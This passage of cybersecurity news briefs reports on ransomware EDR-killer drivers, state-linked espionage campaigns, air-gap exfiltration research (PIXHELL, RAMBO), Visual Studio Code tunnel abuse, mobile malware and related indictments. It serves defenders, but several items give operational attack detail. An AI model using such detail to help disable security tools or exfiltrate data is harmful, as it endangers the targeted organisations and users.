The findings also follow an evolution of a kernel-mode signed Windows driver used by multiple ransomware gangs to turn off Endpoint Detection and Response (EDR) software that allows it to act as a wiper for deleting critical components associated with those solutions, as opposed to terminating them.
The malware in question is POORTRY, which is delivered by means of a loader named STONESTOP to orchestrate a Bring Your Own Vulnerable Driver (BYOVD) attack, effectively bypassing Driver Signature Enforcement safeguards. Its ability to "force delete" files on disk was first noted by Trend Micro in May 2023.
POORTRY, detected as far back as in 2021, is also referred to as BURNTCIGAR, and has been used by multiple ransomware gangs, including CUBA, BlackCat, Medusa, LockBit, and RansomHub over the years.
"Both the Stonestop executable and the Poortry driver are heavily packed and obfuscated," Sophos said in a recent report. "This loader was obfuscated by a closed-source packer named ASMGuard, available on GitHub."
POORTRY is "focused on disabling EDR products through a series of different techniques, such as removal or modification of kernel notify routines. The EDR killer aims at terminating security-related processes and rendering the EDR agent useless by wiping critical files off disk."
The rogue drivers take advantage of what the company described as a "virtually limitless supply of stolen or improperly used code signing certificates" in order to bypass Microsoft's Driver Signature Verification protections.
The use of an improved version of POORTRY by RansomHub bears notice in light of the fact that the ransomware crew has also been observed utilizing another EDR-killer tool dubbed EDRKillShifter this year.
That's not all. The ransomware group has also been detected utilizing a legitimate tool from Kaspersky called TDSSKiller to disarm EDR services on target systems, indicating that the threat actors are incorporating several programs with similar functionality in their attacks.
"It's important to recognize that threat actors have been consistently experimenting with different methods to disable EDR products — a trend we've been observing since at least 2022," Sophos told The Hacker News. "This experimentation can involve various tactics, such as exploiting vulnerable drivers or using certificates that have been unintentionally leaked or obtained through illegal means."
"While it might seem like there's a significant increase in these activities, it's more accurate to say that this is part of an ongoing process rather than a sudden rise."
"The use of different EDR-killer tools, such as EDRKillShifter by groups like RansomHub, likely reflects this ongoing experimentation. It's also possible that different affiliates are involved, which could explain the use of varied methods, though without specific information, we wouldn't want to speculate too much on that point."
Experts Identify 3 Chinese-Linked Clusters Behind Cyberattacks in Southeast Asia
11.9.24 APT The Hacker News
A trio of threat activity clusters linked to China has been observed compromising more government organizations in Southeast Asia as part of a renewed state-sponsored operation codenamed Crimson Palace, indicating an expansion in the scope of the espionage effort.
Cybersecurity firm Sophos, which has been monitoring the cyber offensive, said it comprises three intrusion sets tracked as Cluster Alpha (STAC1248), Cluster Bravo (STAC1870), and Cluster Charlie (STAC1305). STAC is an abbreviation for "security threat activity cluster."
"The attackers consistently used other compromised organizational and public service networks in that region to deliver malware and tools under the guise of a trusted access point," security researchers Mark Parsons, Morgan Demboski, and Sean Gallagher said in a technical report shared with The Hacker News.
A noteworthy aspect of the attacks is that it entails the use of an unnamed organization's systems as a command-and-control (C2) relay point and a staging ground for tools. A second organization's compromised Microsoft Exchange Server is said to have been utilized to host malware.
Crimson Palace was first documented by the cybersecurity company in early June 2024, with the attacks taking place between March 2023 and April 2024.
While initial activity associated with Cluster Bravo, which overlaps with a threat group called Unfading Sea Haze, was confined to March 2023, a new attack wave detected between January and June 2024 has been observed targeting 11 other organizations and agencies in the same region.
A set of new attacks orchestrated by Cluster Charlie, a cluster that's referred to as Earth Longzhi, has also been identified between September 2023 and June 2024, some of which also involve the deployment of different C2 frameworks like Cobalt Strike, Havoc, and XieBroC2 in order to facilitate post-exploitation and deliver additional payloads like SharpHound for Active Directory infrastructure mapping.
"Exfiltration of data of intelligence value was still an objective after the resumption of activity," the researchers said. "However, much of their effort appeared to be focused on re-establishing and extending their foothold on the target network by bypassing EDR software and rapidly re-establishing access when their C2 implants had been blocked."
Another significant aspect is Cluster Charlie's heavy reliance on DLL hijacking to execute malware, an approach previously adopted by threat actors behind Cluster Alpha, indicating a "cross-pollination" of tactics.
Some of the other open-source programs used by the threat actor include RealBlindingEDR and Alcatraz, which allow for terminating antivirus processes and obfuscating portable executable files (e.g., .exe, .dll, and .sys) with an aim to fly under the radar.
Rounding off the cluster's malware arsenal is a previously unknown keylogger codenamed TattleTale that was originally identified in August 2023 and is capable of collecting Google Chrome and Microsoft Edge browser data.
"The malware can fingerprint the compromised system and check for mounted physical and network drives by impersonating a logged-on user," the researchers explained.
"TattleTale also collects the domain controller name and steals the LSA (Local Security Authority) Query Information Policy, which is known to contain sensitive information related to password policies, security settings, and sometimes cached passwords."
In a nutshell, the three clusters work hand in hand, while simultaneously focusing on specific tasks in the attack chain: Infiltrating target environments and conducting reconnaissance (Alpha), burrowing deep into the networks using various C2 mechanisms (Bravo), and exfiltrating valuable data (Charlie).
"Throughout the engagement, the adversary appeared to continually test and refine their techniques, tools, and practices," the researchers concluded. "As we deployed countermeasures for their bespoke malware, they combined the use of their custom-developed tools with generic, open-source tools often used by legitimate penetration testers, testing different combinations."
New PIXHELL Attack Exploits LCD Screen Noise to Exfiltrate Data from Air-Gapped Computers
11.9.24 Attack The Hacker News
A new side-channel attack dubbed PIXHELL could be abused to target air-gapped computers by breaching the "audio gap" and exfiltrating sensitive information by taking advantage of the noise generated by pixels on an LCD screen.
"Malware in the air-gap and audio-gap computers generates crafted pixel patterns that produce noise in the frequency range of 0 - 22 kHz," Dr. Mordechai Guri, the head of the Offensive Cyber Research Lab in the Department of Software and Information Systems Engineering at the Ben Gurion University of the Negev in Israel, said in a newly published paper.
"The malicious code exploits the sound generated by coils and capacitors to control the frequencies emanating from the screen. Acoustic signals can encode and transmit sensitive information."
The attack is notable in that it doesn't require any specialized audio hardware, loudspeaker, or internal speaker on the compromised computer, instead relying on the LCD screen to generate acoustic signals.
Air-gapping is a crucial security measure that's designed to safeguard mission-critical environments against potentially security threats by physically and logically isolating them from external networks (i.e., internet). This is typically accomplished by disconnecting network cables, disabling wireless interfaces, and disabling USB connections.
That said, such defenses could be circumvented by means of rogue insider or a compromise of the hardware or software supply chain. Another scenario could involve an unsuspecting employee plugging in an infected USB drive to deploy malware capable of triggering a covert data exfiltration channel.
"Phishing, malicious insiders, or other social engineering techniques may be employed to trick individuals with access to the air-gapped system into taking actions that compromise security, such as clicking on malicious links or downloading infected files," Dr. Guri said.
"Attackers may also use software supply chain attacks by targeting software application dependencies or third-party libraries. By compromising these dependencies, they can introduce vulnerabilities or malicious code that may go unnoticed during development and testing."
Like the recently demonstrated RAMBO attack, PIXHELL makes use of the malware deployed on the compromised host to create an acoustic channel for leaking information from audio-gapped systems.
This is made possible by the fact that LCD screens contain inductors and capacitors as part of their internal components and power supply, causing them to vibrate at an audible frequency that produces a high-pitched noise when electricity is passed through the coils, a phenomenon called coil whine.
Specifically, changes in power consumption can induce mechanical vibrations or piezoelectric effects in capacitors, producing audible noise. A crucial aspect that affects the consumption pattern is the number of pixels that are lit and their distribution across the screen, as white pixels require more power to display than dark pixels.
"Also, when alternating current (AC) passes through the screen capacitors, they vibrate at specific frequencies," Dr. Guri said. "The acoustic emanates are generated by the internal electric part of the LCD screen. Its characteristics are affected by the actual bitmap, pattern, and intensity of pixels projected on the screen."
"By carefully controlling the pixel patterns shown on our screen, our technique generates certain acoustic waves at specific frequencies from LCD screens."
An attacker could therefore leverage the technique to exfiltrate the data in the form of acoustic signals that are then modulated and transmitted to a nearby Windows or Android device, which can subsequently demodulate the packets and extract the information.
That having said, it bears noting that the power and quality of the emanated acoustic signal depends on the specific screen structure, its internal power supply, and coil and capacitor locations, among other factors.
Another important thing to highlight is that the PIXHELL attack, by default, is visible to users looking at the LCD screen, given that it involves displaying a bitmap pattern comprising alternate black-and-white rows.
"To remain covert, attackers may use a strategy that transmits while the user is absent," Dr. Guri said. "For example, a so-called 'overnight attack' on the covert channels is maintained during the off-hours, reducing the risk of being revealed and exposed."
The attack, however, could be transformed into a stealthy one during working hours by reducing the pixel colors to very low values prior to transmission -- i.e., using RGB levels of (1,1,1), (3,3,3), (7,7,7), and (15,15,15) -- thereby giving the impression to the user that the screen is black.
But doing so has the side effect of "significantly" bringing down the sound production levels. Nor is the approach foolproof, as a user can still make out anomalous patterns if they look "carefully" at the screen.
This is not the first time audio-gap restrictions have been surmounted in an experimental setup. Prior studies undertaken by Dr. Guri and others have employed sounds generated by computer fans (Fansmitter), hard disk drives (Diskfiltration), CD/DVD drives (CD-LEAK), power supply units (POWER-SUPPLaY), and inkjet printers (Inkfiltration).
As countermeasures, it's recommended to use an acoustic jammer to neutralize the transmission, monitor the audio spectrum for unusual or uncommon signals, limit physical access to authorized personnel, prohibit the use of smartphones, and use an external camera for detecting unusual modulated screen patterns.
Mustang Panda Deploys Advanced Malware to Spy on Asia-Pacific Governments
11.9.24 APT The Hacker News
The threat actor tracked as Mustang Panda has refined its malware arsenal to include new tools in order to facilitate data exfiltration and the deployment of next-stage payloads, according to new findings from Trend Micro.
The cybersecurity firm, which is monitoring the activity cluster under the name Earth Preta, said it observed "the propagation of PUBLOAD via a variant of the worm HIUPAN."
PUBLOAD is a known downloader malware linked to Mustang Panda since early 2022, deployed as part of cyber attacks targeting government entities in the Asia-Pacific (APAC) region to deliver the PlugX malware.
"PUBLOAD was also used to introduce supplemental tools into the targets' environment, such as FDMTP to serve as a secondary control tool, which was observed to perform similar tasks as that of PUBLOAD; and PTSOCKET, a tool used as an alternative exfiltration option," security researchers Lenart Bermejo, Sunny Lu, and Ted Lee said.
Mustang Panda's use of removable drives as a propagation vector for HIUPAN was previously documented by Trend Micro in March 2023. It's tracked by Google-owned Mandiant as MISTCLOAK, which it observed in connection with a cyber espionage campaign targeting the Philippines that may have commenced as far back as September 2021.
PUBLOAD is equipped with features to conduct reconnaissance of the infected network and harvest files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx), while also serving as a conduit for a new hacking tool dubbed FDMTP, which is a "simple malware downloader" implemented based on TouchSocket over Duplex Message Transport Protocol (DMTP).
The captured information is compressed into an RAR archive and exfiltrated to an attacker-controlled FTP site via cURL. Alternatively, Mustang Panda has also been observed deploying a custom program named PTSOCKET that can transfer files in multi-thread mode.
Furthermore, Trend Micro has attributed the adversary to a "fast-paced" spear-phishing campaign that it detected in June 2024 as distributing email messages containing a .url attachment, which, when launched, is used to deliver a signed downloader dubbed DOWNBAIT.
The campaign is believed to have targeted Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan based on the filenames and content of the decoy documents used.
DOWNBAIT is a first-stage loader tool that's used to retrieve and execute the PULLBAIT shellcode in memory, which subsequently downloads and runs the first-stage backdoor referred to as CBROVER.
The implant, for its part, supports file download and remote shell execution capabilities, alongside acting as a delivery vehicle for the PlugX remote access trojan (RAT). PlugX then takes care of deploying another bespoke file collector called FILESAC that can collect the victim's files.
The disclosure comes as Palo Alto Networks Unit 42 detailed Mustang Panda's abuse of Visual Studio Code's embedded reverse shell feature to gain a foothold in target networks, indicating that the threat actor is actively tweaking its modus operandi.
"Earth Preta has shown significant advancements in their malware deployment and strategies, particularly in their campaigns targeting government entities," the researchers said. "The group has evolved their tactics, [...] leveraging multi-stage downloaders (from DOWNBAIT to PlugX) and possibly exploiting Microsoft's cloud services for data exfiltration."
New RAMBO Attack Uses RAM Radio Signals to Steal Data from Air-Gapped Networks
11.9.24 Attack The Hacker News
A novel side-channel attack has been found to leverage radio signals emanated by a device's random access memory (RAM) as a data exfiltration mechanism, posing a threat to air-gapped networks.
The technique has been codenamed RAMBO (short for "Radiation of Air-gapped Memory Bus for Offense") by Dr. Mordechai Guri, the head of the Offensive Cyber Research Lab in the Department of Software and Information Systems Engineering at the Ben Gurion University of the Negev in Israel.
"Using software-generated radio signals, malware can encode sensitive information such as files, images, keylogging, biometric information, and encryption keys," Dr. Guri said in a newly published research paper.
"With software-defined radio (SDR) hardware, and a simple off-the-shelf antenna, an attacker can intercept transmitted raw radio signals from a distance. The signals can then be decoded and translated back into binary information."
Over the years, Dr. Guri has concocted various mechanisms to extract confidential data from offline networks by taking advantage of Serial ATA cables (SATAn), MEMS gyroscope (GAIROSCOPE), LEDs on network interface cards (ETHERLED), and dynamic power consumption (COVID-bit).
Some of the other unconventional approaches devised by the researcher entail leaking data from air-gapped networks via covert acoustic signals generated by graphics processing unit (GPU) fans (GPU-FAN), (ultra)sonic waves produced by built-in motherboard buzzers (EL-GRILLO), and even printer display panels and status LEDs (PrinterLeak).
Last year, Dr. Guri also demonstrated AirKeyLogger, a hardwareless radio frequency keylogging attack that weaponizes radio emissions from a computer's power supply to exfiltrate real-time keystroke data to a remote attacker.
"To leak confidential data, the processor's working frequencies are manipulated to generate a pattern of electromagnetic emissions from the power unit modulated by keystrokes," Dr. Guri noted in the study. "The keystroke information can be received at distances of several meters away via an RF receiver or a smartphone with a simple antenna."
As always with attacks of this kind, it requires the air-gapped network to be first compromised through other means – such as a rogue insider, poisoned USB drives, or a supply chain attack – thereby allowing the malware to trigger the covert data exfiltration channel.
RAMBO is no exception in that the malware is used to manipulate RAM such that it can generate radio signals at clock frequencies, which are then encoded using Manchester encoding and transmitted so as to be received from a distance away.
The encoded data can include keystrokes, documents, and biometric information. An attacker on the other end can then leverage SDR to receive the electromagnetic signals, demodulate and decode the data, and retrieve the exfiltrated information.
"The malware utilizes electromagnetic emissions from the RAM to modulate the information and transmit it outward," Dr. Guri said. "A remote attacker with a radio receiver and antenna can receive the information, demodulate it, and decode it into its original binary or textual representation."
The technique could be used to leak data from air-gapped computers running Intel i7 3.6GHz CPUs and 16 GB RAM at 1,000 bits per second, the research found, with keystrokes being exfiltrated in real-time with 16 bits per key.
"A 4096-bit RSA encryption key can be exfiltrated at 41.96 sec at a low speed and 4.096 bits at a high speed," Dr. Guri said. "Biometric information, small files (.jpg), and small documents (.txt and .docx) require 400 seconds at the low speed to a few seconds at the fast speeds."
"This indicates that the RAMBO covert channel can be used to leak relatively brief information over a short period."
Countermeasures to block the attack include enforcing "red-black" zone restrictions for information transfer, using an intrusion detection system (IDS), monitoring hypervisor-level memory access, using radio jammers to block wireless communications, and using a Faraday cage.
Blind Eagle Targets Colombian Insurance Sector with Customized Quasar RAT
9.9.24 Virus The Hacker News
The Colombian insurance sector is the target of a threat actor tracked as Blind Eagle with the end goal of delivering a customized version of a known commodity remote access trojan (RAT) known as Quasar RAT since June 2024.
"Attacks have originated with phishing emails impersonating the Colombian tax authority," Zscaler ThreatLabz researcher Gaetano Pellegrino said in a new analysis published last week.
The advanced persistent threat (APT), also known as AguilaCiega, APT-C-36, and APT-Q-98, has a track record of focusing on organizations and individuals in South America, particularly related to the government and finance sectors in Colombia and Ecuador.
The attack chains, as recently documented by Kaspersky, originate with phishing emails that entice recipients into clicking on malicious links that serve as the launchpad for the infection process.
The links, either embedded within a PDF attachment or directly in the email body, point to ZIP archives hosted on a Google Drive folder associated with a compromised account that belongs to a regional government organization in Colombia.
"The lure used by Blind Eagle involved sending a notification to the victim, claiming to be a seizure order due to outstanding tax payments," Pellegrino noted. "This is intended to create a sense of urgency and pressure the victim into taking immediate action."
The archive contains within it a Quasar RAT variant dubbed BlotchyQuasar, which packs in additional layers of obfuscation using tools like DeepSea or ConfuserEx to hinder analysis and reverse engineering efforts. It was previously detailed by IBM X-Force in July 2023.
The malware includes capabilities to log keystrokes, execute shell commands, steal data from web browsers and FTP clients, and monitor a victim's interactions with specific banking and payment services located in Colombia and Ecuador.
It also leverages Pastebin as a dead-drop resolver to fetch the command-and-control (C2) domain, with the threat actor leveraging Dynamic DNS (DDNS) services to host the C2 domain.
"Blind Eagle typically shields its infrastructure behind a combination of VPN nodes and compromised routers, primarily located in Colombia," Pellegrino said. "This attack demonstrates the continued use of this strategy."
Chinese Hackers Exploit Visual Studio Code in Southeast Asian Cyberattacks
9.9.24 APT The Hacker News
The China-linked advanced persistent threat (APT) group known as Mustang Panda has been observed weaponizing Visual Studio Code software as part of espionage operations targeting government entities in Southeast Asia.
"This threat actor used Visual Studio Code's embedded reverse shell feature to gain a foothold in target networks," Palo Alto Networks Unit 42 researcher Tom Fakterman said in a report, describing it as a "relatively new technique" that was first demonstrated in September 2023 by Truvis Thornton.
The campaign is assessed to be a continuation of a previously documented attack activity aimed at an unnamed Southeast Asian government entity in late September 2023.
Mustang Panda, also known by the names BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, RedDelta, and Red Lich, has been operational since 2012, routinely conducting cyber espionage campaigns targeting government and religious entities across Europe and Asia, particularly those located in South China Sea countries.
The latest observed attack sequence is notable for its abuse of Visual Studio Code's reverse shell to execute arbitrary code and deliver additional payloads.
"To abuse Visual Studio Code for malicious purposes, an attacker can use the portable version of code.exe (the executable file for Visual Studio Code), or an already installed version of the software," Fakterman noted. "By running the command code.exe tunnel, an attacker receives a link that requires them to log into GitHub with their own account."
Once this step is complete, the attacker is redirected to a Visual Studio Code web environment that's connected to the infected machine, allowing them to run commands or create new files.
It's worth pointing out that the malicious use of this technique was previously highlighted by a Dutch cybersecurity firm mnemonic in connection with zero-day exploitation of a vulnerability in Check Point's Network Security gateway products (CVE-2024-24919, CVSS score: 8.6) earlier this year.
Unit 42 said the Mustang Panda actor leveraged the mechanism to deliver malware, perform reconnaissance, and exfiltrate sensitive data. Furthermore, the attacker is said to have used OpenSSH to execute commands, transfer files, and spread across the network.
That's not all. A closer analysis of the infected environment has revealed a second cluster of activity "occurring simultaneously and at times even on the same endpoints" that utilized the ShadowPad malware, a modular backdoor widely shared by Chinese espionage groups.
It's currently unclear if these two intrusion sets are related to one another, or if two different groups are "piggybacking on each other's access."
"Based on the forensic evidence and timeline, one could conclude that these two clusters originated from the same threat actor (Stately Taurus)," Fakterman said. "However, there could be other possible explanations that can account for this connection, such as a collaborative effort between two Chinese APT threat actors."
Progress Software Issues Patch for Vulnerability in LoadMaster and MT Hypervisor
9.9.24 Vulnerebility The Hacker News
Progress Software has released security updates for a maximum-severity flaw in LoadMaster and Multi-Tenant (MT) hypervisor that could result in the execution of arbitrary operating system commands.
Tracked as CVE-2024-7591 (CVSS score: 10.0), the vulnerability has been described as an improper input validation bug that results in OS command injection.
"It is possible for unauthenticated, remote attackers who have access to the management interface of LoadMaster to issue a carefully crafted http request that will allow arbitrary system commands to be executed," the company said in an advisory last week.
"This vulnerability has been closed by sanitizing request user input to mitigate arbitrary system commands execution."
The flaw affects the following versions -
LoadMaster (7.2.60.0 and all prior versions)
Multi-Tenant Hypervisor (7.1.35.11 and all prior versions)
Security researcher Florian Grunow has been credited with discovering and reporting the flaw. Progress said it has found no evidence of the vulnerability being exploited in the wild.
That said, it's recommended that users apply the latest fixes as soon as possible by downloading an add-on package. The update can be installed by navigating to System Configuration > System Administration > Update Software.
"We are encouraging all customers to upgrade their LoadMaster implementations as soon as possible to harden their environment," the company said. "We also strongly recommend that customers follow our security hardening guidelines."
New Android SpyAgent Malware Uses OCR to Steal Crypto Wallet Recovery Keys
9.9.24 Virus The Hacker News
Android device users in South Korea have emerged as a target of a new mobile malware campaign that delivers a new type of threat dubbed SpyAgent.
The malware "targets mnemonic keys by scanning for images on your device that might contain them," McAfee Labs researcher SangRyol Ryu said in an analysis, adding the targeting footprint has broadened in scope to include the U.K.
The campaign makes use of bogus Android apps that are disguised as seemingly legitimate banking, government facilities, streaming, and utility apps in an attempt to trick users into installing them. As many as 280 fake applications have been detected since the start of the year.
It all starts with SMS messages bearing booby-trapped links that urge users to download the apps in question in the form of APK files hosted on deceptive sites. Once installed, they are designed to request intrusive permissions to collect data from the devices.
This includes contacts, SMS messages, photos, and other device information, all of which is then exfiltrated to an external server under the threat actor's control.
The most notable feature is its ability to leverage optical character recognition (OCR) to steal mnemonic keys, which refer to a recovery or seed phrase that allows users to regain access to their cryptocurrency wallets.
Unauthorized access to the mnemonic keys could, therefore, allow threat actors to take control of the victims' wallets and siphon all the funds stored in them.
McAfee Labs said the command-and-control (C2) infrastructure suffered from serious security lapses that not only allowed navigating to the site's root directory without authentication, but also left exposed the gathered data from victims.
The server also hosts an administrator panel that acts as a one-stop shop to remotely commandeer the infected devices. The presence of an Apple iPhone device running iOS 15.8.2 with system language set to Simplified Chinese ("zh") in the panel is a sign that it may also be targeting iOS users.
"Originally, the malware communicated with its command-and-control (C2) server via simple HTTP requests," Ryu said. "While this method was effective, it was also relatively easy for security tools to track and block."
"In a significant tactical shift, the malware has now adopted WebSocket connections for its communications. This upgrade allows for more efficient, real-time, two-way interactions with the C2 server and helps it avoid detection by traditional HTTP-based network monitoring tools."
The development comes a little over a month after Group-IB exposed another Android remote access trojan (RAT) referred to as CraxsRAT targeting banking users in Malaysia since at least February 2024 using phishing websites. It's worth pointing out that CraxsRAT campaigns have also been previously found to have targeted Singapore no later than April 2023.
"CraxsRAT is a notorious malware family of Android Remote Administration Tools (RAT) that features remote device control and spyware capabilities, including keylogging, performing gestures, recording cameras, screens, and calls," the Singaporean company said.
"Victims that downloaded the apps containing CraxsRAT android malware will experience credentials leakage and their funds withdrawal illegitimately."
TIDRONE Espionage Group Targets Taiwan Drone Makers in Cyber Campaign
9.9.24 BigBrothers The Hacker News
A previously undocumented threat actor with likely ties to Chinese-speaking groups has predominantly singled out drone manufacturers in Taiwan as part of a cyber attack campaign that commenced in 2024.
Trend Micro is tracking the adversary under the moniker TIDRONE, stating the activity is espionage-driven given the focus on military-related industry chains.
The exact initial access vector used to breach targets is presently unknown, with Trend Micro's analysis uncovering the deployment of custom malware such as CXCLNT and CLNTEND using remote desktop tools like UltraVNC.
An interesting commonality observed across different victims is the presence of the same enterprise resource planning (ERP) software, raising the possibility of a supply chain attack.
The attack chains subsequently go through three different stages that are designed to facilitate privilege escalation by means of a User Access Control (UAC) bypass, credential dumping, and defense evasion by disabling antivirus products installed on the hosts.
Both the backdoors are initiated by sideloading a rogue DLL via the Microsoft Word application, allowing the threat actors to harvest a wide range of sensitive information,
CXCLNT comes equipped with basic upload and download file capabilities, as well as features for clearing traces, collecting victim information such as file listings and computer names, and downloading next-stage portable executable (PE) and DLL files for execution.
CLNTEND, first detected in April 2024, is a discovered remote access tool (RAT) that supports a wider range of network protocols for communication, including TCP, HTTP, HTTPS, TLS, and SMB (port 445).
"The consistency in file compilation times and the threat actor's operation time with other Chinese espionage-related activities supports the assessment that this campaign is likely being carried out by an as-yet unidentified Chinese-speaking threat group," security researchers Pierre Lee and Vickie Su said.
U.S. Offers $10 Million for Info on Russian Cadet Blizzard Hackers Behind Major Attacks
9.9.24 BigBrothers The Hacker News
The U.S. government and a coalition of international partners have officially attributed a Russian hacking group tracked as Cadet Blizzard to the General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155).
"These cyber actors are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020," the agencies said.
"Since early 2022, the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to Ukraine."
Targets of the attacks have focused on critical infrastructure and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of North Atlantic Treaty Organization (NATO) members, the European Union, Central American, and Asian countries.
The joint advisory, released last week as part of a coordinated exercise dubbed Operation Toy Soldier, comes from cybersecurity and intelligence authorities in the U.S., the Netherlands, the Czech Republic, Germany, Estonia, Latvia, Ukraine, Canada, Australia, and the U.K.
Cadet Blizzard, also known as Ember Bear, FROZENVISTA, Nodaria, Ruinous Ursa, UAC-0056, and UNC2589, gained attention in January 2022 for deploying the destructive WhisperGate (aka PAYWIPE) malware against multiple Ukrainian victim organizations in advance of Russia's full-blown military invasion of the country.
Back in June 2024, a 22-year-old Russian national named Amin Timovich Stigal was indicted in the U.S. for his alleged role in staging destructive cyber attacks against Ukraine using the wiper malware. That said, the use of WhisperGate is said to be not unique to the group.
The U.S. Department of Justice (DoJ) has since charged five officers associated with Unit 29155 for conspiracy to commit computer intrusion and wire fraud conspiracy against targets in Ukraine, the U.S. and 25 other NATO countries.
The names of the five officers are listed below -
Yuriy Denisov (Юрий Денисов), a colonel in the Russian military and a commanding officer of Cyber Operations for Unit 29155
Vladislav Borovkov (Владислав Боровков), Denis Denisenko (Денис Денисенко), Dmitriy Goloshubov (Дима Голошубов), and Nikolay Korchagin (Николай Корчагин), lieutenants in the Russian military assigned to Unit 29155 who worked on cyber operations
"The defendants did so in order to sow concern among Ukrainian citizens regarding the safety of their government systems and personal data," the DoJ said. "The defendants' targets included Ukrainian Government systems and data with no military or defense-related roles. Later targets included computer systems in countries around the world that were providing support to Ukraine."
Concurrent with the indictment, the U.S. Department of State's Rewards for Justice program has announced a reward of up to $10 million for information on any of the defendants' locations or their malicious cyber activity.
Indications are that Unit 29155 is responsible for attempted coups, sabotage, and influence operations, and assassination attempts throughout Europe, with the adversary broadening their horizons to include offensive cyber operations since at least 2020.
The end goal of these cyber intrusions is to collect sensitive information for espionage purposes, inflict reputational harm by leaking said data, and orchestrate destructive operations that aim to sabotage systems containing valuable data.
Unit 29155, per the advisory, is believed to comprise junior, active-duty GRU officers, who also rely on known cybercriminals and other civilian enablers such as Stigal to facilitate their missions.
These comprise website defacements, infrastructure scanning, data exfiltration, and data leak operations that involve releasing the information on public website domains or selling it to other actors.
Attack chains commence with scanning activity that leverages known security flaws in Atlassian Confluence Server and Data Center, Dahua Security, and Sophos' firewall to breach victim environments, followed by using Impacket for post-exploitation and lateral movement, and ultimately exfiltrating data to dedicated infrastructure.
"Cyber actors may have used Raspberry Robin malware in the role of an access broker," the agencies noted. "Cyber actors targeted victims' Microsoft Outlook Web Access (OWA) infrastructure with password spraying to obtain valid usernames and passwords."
Organizations are recommended to prioritize routine system updates and remediate known exploited vulnerabilities, segment networks to prevent the spread of malicious activity, and enforce phishing-resistant multi-factor authentication (MFA) for all externally facing account services.
North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams
8.9.24 APT The Hacker News
Threat actors affiliated with North Korea have been observed leveraging LinkedIn as a way to target developers as part of a fake job recruiting operation.
These attacks employ coding tests as a common initial infection vector, Google-owned Mandiant said in a new report about threats faced by the Web3 sector.
"After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge," researchers Robert Wallace, Blas Kojusner, and Joseph Dobson said.
The malware functions as a launchpad to compromise the target's macOS system by downloading a second-stage payload that establishes persistence via Launch Agents and Launch Daemons.
It's worth pointing out that this is one of many activity clusters – namely Operation Dream Job, Contagious Interview, and others – undertaken by North Korean hacking groups that make use of job-related decoys to infect targets with malware.
Recruiting-themed lures have also been a prevalent tactic to deliver malware families such as RustBucket and KANDYKORN. It's currently not clear if COVERTCATCH has any connection to these strains, or the newly identified TodoSwift.
Mandiant said it observed a social engineering campaign that delivered a malicious PDF disguised as a job description for a "VP of Finance and Operations" at a prominent cryptocurrency exchange.
"The malicious PDF dropped a second-stage malware known as RustBucket which is a backdoor written in Rust that supports file execution."
The RustBucket implant is equipped to harvest basic system information, communicate with a URL provided via the command-line, and set up persistence using a Launch Agent that disguises itself as a "Safari Update" in order to contact a hard-coded command-and-control (C2) domain.
North Korea's targeting of Web3 organizations also go beyond social engineering to encompass software supply chain attacks, as observed in the incidents aimed at 3CX and JumpCloud in recent years.
"Once a foothold is established via malware, the attackers pivot to password managers to steal credentials, perform internal reconnaissance via code repos and documentation, and pivot into the cloud hosting environment to reveal hot wallet keys and eventually drain funds," Mandiant said.
The disclosure comes amid a warning from the U.S. Federal Bureau of Investigation (FBI) about North Korean threat actors' targeting of the cryptocurrency industry using "highly tailored, difficult-to-detect social engineering campaigns."
These ongoing efforts, which impersonate recruiting firms or individuals that a victim may know personally or indirectly with offers of employment or investment, are seen as a conduit for brazen crypto heists that are designed to generate illicit income for hermit kingdom, which has been the subject of international sanctions.
Notable among the tactics employed include identifying cryptocurrency-related businesses of interest, conducting extensive pre-operational research on their targets before initiating contact, and concocting personalized fake scenarios in an attempt to appeal to prospective victims and increase the likelihood of success of their attacks.
"The actors may reference personal information, interests, affiliations, events, personal relationships, professional connections, or details a victim may believe are known to few others," the FBI said, highlighting attempts to build rapport and eventually deliver malware.
"If successful in establishing bidirectional contact, the initial actor, or another member of the actor's team, may spend considerable time engaging with the victim to increase the sense of legitimacy and engender familiarity and trust."
FBI Cracks Down on Dark Web Marketplace Managed by Russian and Kazakh Nationals
8.9.24 BigBrothers The Hacker News
Two men have been indicted in the U.S. for their alleged involvement in managing a dark web marketplace called WWH Club that specializes in the sale of sensitive personal and financial information.
Alex Khodyrev, a 35-year-old Kazakhstan national, and Pavel Kublitskii, a 37-year-old Russian national, have been charged with conspiracy to commit access device fraud and conspiracy to commit wire fraud.
Khodyrev and Kublitskii, between 2014 and 2024, acted as the main administrators of WWH Club (wwh-club[.]ws) and various other sister sites – wwh-club[.]net, center-club[.]pw, opencard[.]pw, skynetzone[.]org – that functioned as dark web marketplaces, forums, and training centers to enable cybercrime.
The indictment follows an investigation launched by the U.S. Federal Bureau of Investigation (FBI) in July 2020 after determining that WWH Club's primary domain (www-club[.]ws]) resolved to an IP address belonging to DigitalOcean, allowing them to issue a federal search warrant to the infrastructure company.
"WWH Club and sister site members used the marketplaces to buy and sell stolen personal identifying information (PII), credit card and bank account information, and computer passwords, among other sensitive information," the U.S. Department of Justice (DoJ) said.
The forums, on the other hand, acted as a hotspot for discussions on best practices for committing fraud, launching cyber attacks, and evading law enforcement.
Furthermore, the darknet marketplace offered online courses for aspiring and active cyber criminals on how to conduct frauds. The advertised cost of the course ranged from 10,000 rubles to 60,000 rubles (about $110 to $664 as of September 7, 2024) and an additional $200 for training materials.
Court documents show that undercover FBI agents signed up for the site and paid approximately $1,000 in bitcoin to attend a training course offered by the platform that included topics such as the sale of sensitive information, DDoS and hacking services, credit card skimmers, and brute-force programs.
"The training was conducted through a chat function on the forum to a class of approximately 50 students; the various instructors provided training in text format rather than audible instruction," the criminal complaint reads. "It was apparent the purpose of the training was to educate individuals on how to obtain and use stolen credit card data and PII to generate fraudulent proceeds."
WWH Club is estimated to have had 353,000 users worldwide as of March 2023, up from 170,000 registered users in July 2020. Both Khodyrev and Kublitskii are believed to have profited from the membership fees, tuition fees, and advertising revenue.
